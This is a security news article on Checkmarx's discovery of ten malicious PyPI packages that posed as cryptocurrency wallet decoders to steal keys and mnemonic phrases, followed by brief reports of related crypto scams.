A new set of malicious packages has been unearthed in the Python Package Index (PyPI) repository that masqueraded as cryptocurrency wallet recovery and management services, only to siphon sensitive data and facilitate the theft of valuable digital assets.
"The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other prominent wallets in the crypto ecosystem," Checkmarx researcher Yehuda Gelb said in a Tuesday analysis.
"Presenting themselves as utilities for extracting mnemonic phrases and decrypting wallet data, these packages appeared to offer valuable functionality for cryptocurrency users engaged in wallet recovery or management."
However, they harbor functionality to steal private keys, mnemonic phrases, and other sensitive wallet data, such as transaction histories or wallet balances. Each of the packages attracted hundreds of downloads prior to them being taken down -
- atomicdecoderss (366 downloads)
- trondecoderss (240 downloads)
- phantomdecoderss (449 downloads)
- trustdecoderss (466 downloads)
- exodusdecoderss (422 downloads)
- walletdecoderss (232 downloads)
- ccl-localstoragerss (335 downloads)
- exodushcates (415 downloads)
- cipherbcryptors (450 downloads)
- ccl_leveldbases (407 downloads)
Checkmarx said the packages were named so in a deliberate attempt to lure developers working in the cryptocurrency ecosystem. In a further attempt to lend legitimacy to the libraries, the package descriptions on PyPI came with installation instructions, usage examples, and in one case, even "best practices" for virtual environments.
The deception didn't stop there, for the threat actor behind the campaign also managed to display fake download statistics, giving users the impression that the packages were popular and trustworthy.
Six of the identified PyPI packages included a dependency called cipherbcryptors to execute the malicious, while a few others relied on an additional package named ccl_leveldbases in an apparent effort to obfuscate the functionality.
A notable aspect of the packages is that the malicious functionality is triggered only when certain functions are called, marking a denture from the typical pattern where such behavior would be activated automatically upon installation. The captured data is then exfiltrated to a remote server.
"The attacker employed an additional layer of security by not hard-coding the address of their command and control server within any of the packages," Gelb said. "Instead, they used external resources to retrieve this information dynamically."
This technique, called dead drop resolver, gives the attackers the flexibility to update the server information without having to push out an update to the packages themselves. It also makes the process of switching to a different infrastructure easy should the servers be taken down.
"The attack exploits the trust in open-source communities and the apparent utility of wallet management tools, potentially affecting a broad spectrum of cryptocurrency users," Gelb said.
"The attack's complexity – from its deceptive packaging to its dynamic malicious capabilities and use of malicious dependencies – highlights the importance of comprehensive security measures and continuous monitoring."
The development is just the latest in a series of malicious campaigns targeting the cryptocurrency sector, with threat actors constantly on the lookout for new ways to drain funds from victim wallets.
In August 2024, details emerged of a sophisticated cryptocurrency scam operation dubbed CryptoCore that involves using fake videos or hijacked accounts on social media platforms like Facebook, Twitch, X, and YouTube to lure users into parting with their cryptocurrency assets under the guise of quick and easy profits.
"This scam group and its giveaway campaigns leverage deepfake technology, hijacked YouTube accounts, and professionally designed websites to deceive users into sending their cryptocurrencies to the scammers' wallets," Avast researcher Martin Chlumecký said.
"The most common method is convincing a potential victim that messages or events published online are official communication from a trusted social media account or event page, thereby piggybacking on the trust associated with the chosen brand, person, or event."
Then last week, Check Point shed light on a rogue Android app that impersonated the legitimate WalletConnect open-source protocol to steal approximately $70,000 in cryptocurrency by initiating fraudulent transactions from infected devices.